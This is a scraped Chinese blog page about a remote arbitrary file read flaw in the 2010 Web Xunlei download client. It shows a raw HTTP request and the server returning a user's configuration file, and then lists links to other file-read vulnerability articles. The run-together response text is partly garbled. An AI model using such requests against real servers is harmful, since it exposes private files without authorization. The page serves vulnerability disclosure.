GET /.../Profiles/UserConfig.ini HTTP/1.1
HTTP/1.0 200 OK
Server: Xunlei Http Server/1.0Date: Tue, 23 Nov 2010 09:02:07 GMT
Content-type: *Content-length: 407Last-Modified: Tue, 23 Nov 2010 08:43:15 GMT[Skin]CurrSkin=default.rar
SkinNames=default.rar
[Monitor]ExtendNames=.asf;.avi;.exe;.iso;.mp3;.mpeg;.mpg;.mpga;.ra;.rar;.rm;.rmvb;.tar;.w
ma;.wmp;.wmv;.zip;.torrent;FilterSitesMax=20[EMuleGenericSettings]EMuleWatchLink=1[Update]RunUpdate=0[General]TaskShowPerPage=11[Antivirus]Protect=0FilePath=Parameter=[BHOSection]StatsDay=2[SavePath]SetFolderIcon=1Path=C:\Xunlei\
发送 43, r接受 579: 无sock
C:\Documents and Settings\Administrator>

转载于:https://blog.51cto.com/hellxman/744042

Web迅雷远程任意文件读取漏洞相关推荐

1. 小米路由器http文件服务器,小米路由器远程任意文件读取漏洞（CVE-2019-18371）

   ## 远程任意文件读取漏洞(CVE-2019-18371) #### 小米路由器的nginx配置文件错误,导致目录穿越漏洞,实现任意文件读取(无需登录) nginx配置不当可导致目录穿越漏洞, ``` ...

2. CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)

   CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...

3. CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)

   漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...

4. Web漏洞-任意文件读取漏洞

   任意文件读取漏洞 原理 任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过 ...

5. 任意文件读取漏洞知识梳理

   文章目录 1.概述 2.开发语言触发点 2.1 PHP 2.2 Python 2.3 Java 2.4 Ruby 2.5 Node 3.中间件/服务器相关触发点 3.1 Nginx错误配置 3.2 数 ...

6. 《从0到1：CTFer成长之路》1.3 任意文件读取漏洞

   文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...

7. 安全研究 | Jenkins 任意文件读取漏洞分析

   欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

8. gitlab 更新文件_GitLab任意文件读取漏洞公告

   2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

9. Grafana 中存在严重的未授权任意文件读取漏洞，已遭利用

    聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

最新文章

1. 直接对梯度下手，阿里达摩院提出新型优化方法，一行代码即可替换现有优化器...
2. Linux内核之内核同步（三）——自旋锁
3. 5.1 计算机网络之传输层（传输层提供的服务及功能概述、端口、套接字--Socket、无连接UDP和面向连接TCP服务）
4. 一般控制矩阵转能观标准型
5. 数组输出黑科技----fwrite()
6. 西瓜显示服务器错误,西瓜云服务器
7. C语言给出任意4个数算24点,讨论24点算法。
8. html中js设置密码长度,JS判断邮箱格式，密码输入是否一致，不能为空，长度控制等...
9. VMware中的三种网络模式-----Host-only模式
10. go - range
11. docker 1.8+之后ubuntu安装指定版本docker-engine
12. Google Code Review 处理代码审查中的推回
13. jmeter下载地址
14. [原创]浅析汇编之堆栈平衡
15. 传奇手游漏洞获取gm权限_传奇私服漏洞获取gm权限
16. MTK logo.bin手动制作(个人博客:浏览器直接输入wugn.tech)
17. 视频直播时连麦功能使用说明
18. 用了五年 VS Code ，我决定换成 JetBrains…
19. 黑白图片复原为彩色Picture Colorizer（图片着色器)
20. 网络安全学习笔记（2）

热门文章

1. Django入门项目
2. Nest温控器国内应用指南
3. Xshell 5常用命令（自己整理的，不全）
4. IT猎头的几天生活感想（(做IT的一定要看啊～～看了真是。。。）
5. HBuilderX插件_HBUilderX 的使用教程
6. iOS开发的一些奇巧淫技3
7. Oracle中ALTER TABLE的五种用法（二）
8. 1613-3-傅溥衍 总结《2016年12月5日》【连续第六十六天总结】
9. 曲线运动与万有引力公式_高中物理必修二曲线运动到万有引力公式
10. 【Python字典】